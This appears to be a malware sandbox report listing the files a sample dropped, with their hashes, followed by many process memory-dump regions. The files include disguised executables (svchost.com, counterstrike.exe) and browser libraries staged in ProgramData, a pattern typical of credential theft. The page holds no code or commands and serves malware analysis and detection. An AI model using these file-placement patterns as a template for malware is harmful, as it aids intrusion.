6729da8220b548fa8b9d9f23ae39330a5dcb4ac22597121ce56dca6d433ac061502d6c270032135b321d6f4d79b4f0e7299efa961f8c7a3a49508be06cbab02a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ED0E.exe
MD5
ec4b9c17368fdf0cad1cf908545274c7

SHA1
fe590d548b1695624490dfb565b530a5984ac994

SHA256
dbd52332617717877140c5f5373fa26ed44c7fca36907baf0feeeef5cc5b8811

SHA512
fd17cb2dbe373298091aee39ceb33cbb1b357c75b8fb8e861c0d13f6d4191f35f8dfb3221d459824fb15135077eb08c410389390495263c6a1d45f531202dfb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ED0E.exe
MD5
ec4b9c17368fdf0cad1cf908545274c7

SHA1
fe590d548b1695624490dfb565b530a5984ac994

SHA256
dbd52332617717877140c5f5373fa26ed44c7fca36907baf0feeeef5cc5b8811

SHA512
fd17cb2dbe373298091aee39ceb33cbb1b357c75b8fb8e861c0d13f6d4191f35f8dfb3221d459824fb15135077eb08c410389390495263c6a1d45f531202dfb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\F5C9.exe
MD5
9178fcbe93696a79dbeae5d559ae6d64

SHA1
edde7eece84153504a5d94ea9eeb178125fe8f94

SHA256
0c79cceaf053cd034c8e6e4ae7bbc590eeb10c4a03c456c04d38aa0357f60e19

SHA512
ce610cf2d44b786168b4204c7da147169ed3f26407e10afebfa1803da42447552225ba849f3d67900d8b3a71b6839e50433cf3c11a4bb6bd0d0bee9b5ca84ec4

Download Submit
C:\Users\Admin\AppData\Local\Temp\F5C9.exe
MD5
9178fcbe93696a79dbeae5d559ae6d64

SHA1
edde7eece84153504a5d94ea9eeb178125fe8f94

SHA256
0c79cceaf053cd034c8e6e4ae7bbc590eeb10c4a03c456c04d38aa0357f60e19

SHA512
ce610cf2d44b786168b4204c7da147169ed3f26407e10afebfa1803da42447552225ba849f3d67900d8b3a71b6839e50433cf3c11a4bb6bd0d0bee9b5ca84ec4

Download Submit
C:\Users\Admin\AppData\Local\Temp\aommonjs.exe
MD5
d007d6bf13b708c667abf217309631be

SHA1
17d9ea176b26ecbe18535ff4b36803afeed72a3c

SHA256
7a83de0929feb88b31aebbf17a2d6c5524a75aef19df48932f0c511802c05a91

SHA512
8a83c81ee693ecaaec2f2e46b50079fc380884a54b38df0f23eb4b4883548a9d40e5ba7fb09eeded9ae5e8abf73d6985d2089842f05ab352a980a47996b6c266

Download Submit
C:\Users\Admin\AppData\Local\Temp\leakless-34a05a9dc363ec03e25d5dcc5ff915d2\leakless.exe
MD5
3ea012e26f60ab84a7cf5ad579a83cf4

SHA1
3bd5db30c5a7c8f98a8ccffef341bdd185d3293f

SHA256
6239686d69c87891881710569472e327dadbce031d98f08fea0f98d8c1d62399

SHA512
f3272c880671a1a7a877682f1637ee8e4095990156bee13a41da79ddeb466e540268fc827ed23ac6748ce37a924dc321936e3df031700d0c551031af967457e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\leakless-34a05a9dc363ec03e25d5dcc5ff915d2\leakless.exe
MD5
3ea012e26f60ab84a7cf5ad579a83cf4

SHA1
3bd5db30c5a7c8f98a8ccffef341bdd185d3293f

SHA256
6239686d69c87891881710569472e327dadbce031d98f08fea0f98d8c1d62399

SHA512
f3272c880671a1a7a877682f1637ee8e4095990156bee13a41da79ddeb466e540268fc827ed23ac6748ce37a924dc321936e3df031700d0c551031af967457e0

Download Submit
C:\Users\Admin\AppData\Roaming\counterstrike.exe
MD5
a0adb1ad8fae9089f5666583a21a044b

SHA1
dbfae2e93a80ca5820e8e83688e0c12abc255709

SHA256
0b3132d2b5cac85d7ac00f28aade70ab6688fdedbb50098916b0c48cec30649d

SHA512
e0dd2737203be27675af2caa6de186083ba1a75d9638041d40372aabb9e56f34a528c863af4dfe5ca955a1e7d509ab45354754185e16170367f4a0722eec739c

Download Submit
C:\Users\Admin\AppData\Roaming\counterstrike.exe
MD5
a0adb1ad8fae9089f5666583a21a044b

SHA1
dbfae2e93a80ca5820e8e83688e0c12abc255709

SHA256
0b3132d2b5cac85d7ac00f28aade70ab6688fdedbb50098916b0c48cec30649d

SHA512
e0dd2737203be27675af2caa6de186083ba1a75d9638041d40372aabb9e56f34a528c863af4dfe5ca955a1e7d509ab45354754185e16170367f4a0722eec739c

Download Submit
C:\Windows\SysWOW64\nkqxfcyb\aommonjs.exe
MD5
d007d6bf13b708c667abf217309631be

SHA1
17d9ea176b26ecbe18535ff4b36803afeed72a3c

SHA256
7a83de0929feb88b31aebbf17a2d6c5524a75aef19df48932f0c511802c05a91

SHA512
8a83c81ee693ecaaec2f2e46b50079fc380884a54b38df0f23eb4b4883548a9d40e5ba7fb09eeded9ae5e8abf73d6985d2089842f05ab352a980a47996b6c266

Download Submit
C:\Windows\directx.sys
MD5
f3f5b1ae4b9b81b0bfb72f6c3041178e

SHA1
d87534b8865c8569e7f0db1f9a4993b8a671714b

SHA256
24436a3b8e8ec7e220ac77a32242e0a39a2c780a0abc6c5ee6d84c5965806b99

SHA512
b901a69c111073865c386d2571d9a83da0dce09c4179dcc3567d9dd6f6a10ea588ca911b67a71fa96b0c50bc224da50930d63895665a85c6eedad0cbd8a3fbb1

Download Submit
C:\Windows\svchost.com
MD5
36fd5e09c417c767a952b4609d73a54b

SHA1
299399c5a2403080a5bf67fb46faec210025b36d

SHA256
980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2

SHA512
1813a6a5b47a9b2cd3958cf4556714ae240f2aa19d0a241b596830f0f2b89a33ec864d00ce6a791d323a58dfbff42a0fded65eefbf980c92685e25c0ec415d92

Download Submit
C:\Windows\svchost.com
MD5
36fd5e09c417c767a952b4609d73a54b

SHA1
299399c5a2403080a5bf67fb46faec210025b36d

SHA256
980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2

SHA512
1813a6a5b47a9b2cd3958cf4556714ae240f2aa19d0a241b596830f0f2b89a33ec864d00ce6a791d323a58dfbff42a0fded65eefbf980c92685e25c0ec415d92

Download Submit
C:\Windows\svchost.com
MD5
36fd5e09c417c767a952b4609d73a54b

SHA1
299399c5a2403080a5bf67fb46faec210025b36d

SHA256
980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2

SHA512
1813a6a5b47a9b2cd3958cf4556714ae240f2aa19d0a241b596830f0f2b89a33ec864d00ce6a791d323a58dfbff42a0fded65eefbf980c92685e25c0ec415d92

Download Submit
C:\odt\OFFICE~1.EXE
MD5
02c3d242fe142b0eabec69211b34bc55

SHA1
ea0a4a6d6078b362f7b3a4ad1505ce49957dc16e

SHA256
2a1ed24be7e3859b46ec3ebc316789ead5f12055853f86a9656e04b4bb771842

SHA512
0efb08492eaaa2e923beddc21566e98fbbef3a102f9415ff310ec616f5c84fd2ba3a7025b05e01c0bdf37e5e2f64dfd845f9254a376144cc7d827e7577dbb099

Download Submit
\??\pipe\crashpad_3960_MODNODHRNLCKQGVO
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\ProgramData\mozglue.dll
MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
\ProgramData\mozglue.dll
MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
\ProgramData\sqlite3.dll
MD5
e477a96c8f2b18d6b5c27bde49c990bf

SHA1
e980c9bf41330d1e5bd04556db4646a0210f7409

SHA256
16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

SHA512
335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

Download Submit
\ProgramData\sqlite3.dll
MD5
e477a96c8f2b18d6b5c27bde49c990bf

SHA1
e980c9bf41330d1e5bd04556db4646a0210f7409

SHA256
16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

SHA512
335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

Download Submit
memory/300-164-0x00000000004E0000-0x000000000062A000-memory.dmp

Filesize
1.3MB

Download
memory/300-133-0x0000000000000000-mapping.dmp

Download
memory/300-159-0x00000000007D6000-0x00000000007E7000-memory.dmp

Filesize
68KB

Download
memory/404-227-0x0000000004D60000-0x0000000005366000-memory.dmp

Filesize
6.0MB

Download
memory/404-213-0x000000000041932E-mapping.dmp

Download
memory/404-212-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/484-140-0x0000000000AA0000-0x0000000000C76000-memory.dmp

Filesize
1.8MB

Download
memory/484-151-0x00000000051D0000-0x00000000051D1000-memory.dmp

Filesize
4KB

Download
memory/484-143-0x0000000000D80000-0x0000000000DC5000-memory.dmp

Filesize
276KB

Download
memory/484-192-0x0000000005650000-0x0000000005651000-memory.dmp

Filesize
4KB

Download
memory/484-145-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

Filesize
4KB

Download
memory/484-142-0x0000000074D70000-0x0000000074F32000-memory.dmp

Filesize
1.8MB

Download
memory/484-147-0x0000000072990000-0x0000000072A10000-memory.dmp

Filesize
512KB

Download
memory/484-148-0x00000000058E0000-0x00000000058E1000-memory.dmp

Filesize
4KB

Download
memory/484-205-0x00000000060F0000-0x00000000060F1000-memory.dmp

Filesize
4KB

Download
memory/484-149-0x0000000005170000-0x0000000005171000-memory.dmp

Filesize
4KB

Download
memory/484-150-0x00000000052D0000-0x00000000052D1000-memory.dmp

Filesize
4KB

Download
memory/484-144-0x0000000076130000-0x0000000076221000-memory.dmp

Filesize
964KB

Download
memory/484-152-0x0000000074F40000-0x00000000754C4000-memory.dmp

Filesize
5.5MB

Download
memory/484-157-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/484-141-0x00000000005E0000-0x00000000005E1000-memory.dmp

Filesize
4KB

Download
memory/484-153-0x00000000768C0000-0x0000000077C08000-memory.dmp

Filesize
19.3MB

Download
memory/484-136-0x0000000000000000-mapping.dmp

Download
memory/484-139-0x0000000000AA0000-0x0000000000C76000-memory.dmp

Filesize
1.8MB

Download
memory/484-158-0x0000000005210000-0x0000000005211000-memory.dmp

Filesize
4KB

Download
memory/484-160-0x0000000070BE0000-0x0000000070C2B000-memory.dmp

Filesize
300KB

Download
memory/968-266-0x0000000000000000-mapping.dmp

Download
memory/1048-228-0x0000000000000000-mapping.dmp

Download
memory/1300-201-0x0000000000000000-mapping.dmp

Download
memory/1360-383-0x0000000000000000-mapping.dmp

Download
memory/1604-364-0x000000000319259C-mapping.dmp

Download
memory/1656-208-0x0000000000400000-0x00000000004D6000-memory.dmp

Filesize
856KB

Download
memory/1656-154-0x0000000000000000-mapping.dmp

Download
memory/1656-207-0x00000000004F0000-0x000000000050C000-memory.dmp

Filesize
112KB

Download
memory/1856-395-0x0000000000000000-mapping.dmp

Download
memory/1868-317-0x0000000000000000-mapping.dmp

Download
memory/1872-162-0x0000000000402F47-mapping.dmp

Download
memory/1920-357-0x0000000000000000-mapping.dmp

Download
memory/1940-291-0x0000000000000000-mapping.dmp

Download
memory/2084-345-0x0000000000000000-mapping.dmp

Download
memory/2184-165-0x0000000000000000-mapping.dmp

Download
memory/2184-191-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/2184-189-0x00000000020D0000-0x00000000020E3000-memory.dmp

Filesize
76KB

Download
memory/2420-292-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/2420-290-0x0000000000A30000-0x0000000000D93000-memory.dmp

Filesize
3.4MB

Download
memory/2420-298-0x0000000000A30000-0x0000000000D93000-memory.dmp

Filesize
3.4MB

Download
memory/2420-289-0x0000000000A30000-0x0000000000D93000-memory.dmp

Filesize
3.4MB

Download
memory/2420-306-0x0000000000A30000-0x0000000000D93000-memory.dmp

Filesize
3.4MB

Download
memory/2420-276-0x0000000000000000-mapping.dmp

Download
memory/2420-287-0x0000000001440000-0x0000000001485000-memory.dmp

Filesize
276KB

Download
memory/2420-296-0x0000000000A30000-0x0000000000D93000-memory.dmp

Filesize
3.4MB

Download
memory/2480-382-0x0000000000000000-mapping.dmp

Download
memory/2504-177-0x0000000004E90000-0x0000000004E91000-memory.dmp

Filesize
4KB

Download
memory/2504-171-0x0000000000010000-0x0000000000011000-memory.dmp

Filesize
4KB

Download
memory/2504-174-0x0000000004860000-0x0000000004861000-memory.dmp

Filesize
4KB

Download
memory/2504-176-0x0000000002170000-0x0000000002171000-memory.dmp

Filesize
4KB

Download
memory/2504-168-0x0000000000000000-mapping.dmp

Download
memory/2504-175-0x0000000004970000-0x0000000004971000-memory.dmp

Filesize
4KB

Download
memory/2504-173-0x0000000004880000-0x0000000004881000-memory.dmp

Filesize
4KB

Download
memory/2548-239-0x0000000001B00000-0x0000000001B01000-memory.dmp

Filesize
4KB

Download
memory/2548-242-0x0000000001B30000-0x0000000001B31000-memory.dmp

Filesize
4KB

Download
memory/2548-222-0x0000000000000000-mapping.dmp

Download
memory/2548-240-0x0000000001B10000-0x0000000001B11000-memory.dmp

Filesize
4KB

Download
memory/2548-260-0x00000000036F0000-0x00000000036F1000-memory.dmp

Filesize
4KB

Download
memory/2548-245-0x00000000036C0000-0x00000000036C1000-memory.dmp

Filesize
4KB

Download
memory/2548-247-0x00000000036D0000-0x00000000036D1000-memory.dmp

Filesize
4KB

Download
memory/2584-277-0x0000000000000000-mapping.dmp

Download
memory/2772-339-0x0000000000000000-mapping.dmp

Download
memory/2828-193-0x0000000000419326-mapping.dmp

Download
memory/2828-209-0x0000000005090000-0x0000000005696000-memory.dmp

Filesize
6.0MB

Download
memory/2828-190-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/3052-183-0x0000000004FD0000-0x0000000004FE6000-memory.dmp

Filesize
88KB

Download
memory/3052-119-0x0000000000960000-0x0000000000976000-memory.dmp

Filesize
88KB

Download
memory/3052-126-0x0000000000BC0000-0x0000000000BD6000-memory.dmp

Filesize
88KB

Download
memory/3248-323-0x00000000030F0000-0x0000000003105000-memory.dmp

Filesize
84KB

Download
memory/3248-311-0x00000000030F9A6B-mapping.dmp

Download
memory/3256-358-0x0000000000000000-mapping.dmp

Download
memory/3692-118-0x0000000000402F47-mapping.dmp

Download
memory/3692-117-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3740-381-0x0000000000000000-mapping.dmp

Download
memory/3828-115-0x0000000000586000-0x0000000000596000-memory.dmp

Filesize
64KB

Download
memory/3828-116-0x0000000000670000-0x0000000000679000-memory.dmp

Filesize
36KB

Download
memory/3880-178-0x0000000000000000-mapping.dmp

Download
memory/3880-187-0x00000000011B0000-0x00000000011B1000-memory.dmp

Filesize
4KB

Download
memory/3880-186-0x0000000005230000-0x0000000005231000-memory.dmp

Filesize
4KB

Download
memory/3880-181-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/4116-226-0x0000000000000000-mapping.dmp

Download
memory/4172-217-0x0000000000000000-mapping.dmp

Download
memory/4196-354-0x0000000000000000-mapping.dmp

Download
memory/4208-206-0x0000000000000000-mapping.dmp

Download
memory/4236-394-0x000000000A050000-0x000000000A052000-memory.dmp

Filesize
8KB

Download
memory/4236-384-0x0000000000000000-mapping.dmp

Download
memory/4256-322-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/4256-321-0x00000000004E0000-0x000000000062A000-memory.dmp

Filesize
1.3MB

Download
memory/4424-129-0x00000000028A0000-0x000000000290B000-memory.dmp

Filesize
428KB

Download
memory/4424-128-0x0000000002910000-0x0000000002984000-memory.dmp

Filesize
464KB

Download
memory/4424-127-0x0000000000000000-mapping.dmp

Download
memory/4584-385-0x0000000000000000-mapping.dmp

Download
memory/4624-120-0x0000000000000000-mapping.dmp

Download
memory/4624-125-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/4624-386-0x0000000000000000-mapping.dmp

Download
memory/4624-333-0x0000000000000000-mapping.dmp

Download
memory/4624-123-0x0000000000736000-0x0000000000747000-memory.dmp

Filesize
68KB

Download
memory/4624-124-0x00000000005C0000-0x00000000005C9000-memory.dmp

Filesize
36KB

Download
memory/4640-388-0x0000000000000000-mapping.dmp

Download
memory/4644-380-0x000001FDEE6F2000-0x000001FDEE6F4000-memory.dmp

Filesize
8KB

Download
memory/4644-307-0x000001FDEE6F0000-0x000001FDEE6F2000-memory.dmp

Filesize
8KB

Download
memory/4644-299-0x0000000000000000-mapping.dmp

Download
memory/4712-393-0x0000000000000000-mapping.dmp

Download
memory/4720-130-0x0000000000000000-mapping.dmp

Download
memory/4720-131-0x0000000000BF0000-0x0000000000BF7000-memory.dmp

Filesize
28KB

Download
memory/4720-132-0x0000000000BE0000-0x0000000000BEC000-memory.dmp

Filesize
48KB

Download
memory/4820-387-0x0000000000000000-mapping.dmp

Download
memory/4828-324-0x0000000000000000-mapping.dmp

Download
memory/4972-234-0x0000000000060000-0x0000000000061000-memory.dmp

Filesize
4KB

Download
memory/4972-258-0x00000000012E0000-0x00000000012E1000-memory.dmp

Filesize
4KB

Download
memory/4972-241-0x0000000072990000-0x0000000072A10000-memory.dmp

Filesize
512KB

Download
memory/4972-243-0x0000000000DB0000-0x0000000000EFA000-memory.dmp

Filesize
1.3MB

Download
memory/4972-237-0x0000000001330000-0x0000000001331000-memory.dmp

Filesize
4KB

Download
memory/4972-236-0x0000000076130000-0x0000000076221000-memory.dmp

Filesize
964KB

Download
memory/4972-235-0x0000000074D70000-0x0000000074F32000-memory.dmp

Filesize
1.8MB

Download
memory/4972-233-0x0000000001330000-0x0000000001500000-memory.dmp

Filesize
1.8MB

Download
memory/4972-230-0x0000000000000000-mapping.dmp

Download
memory/5100-210-0x0000000000000000-mapping.dmp

Download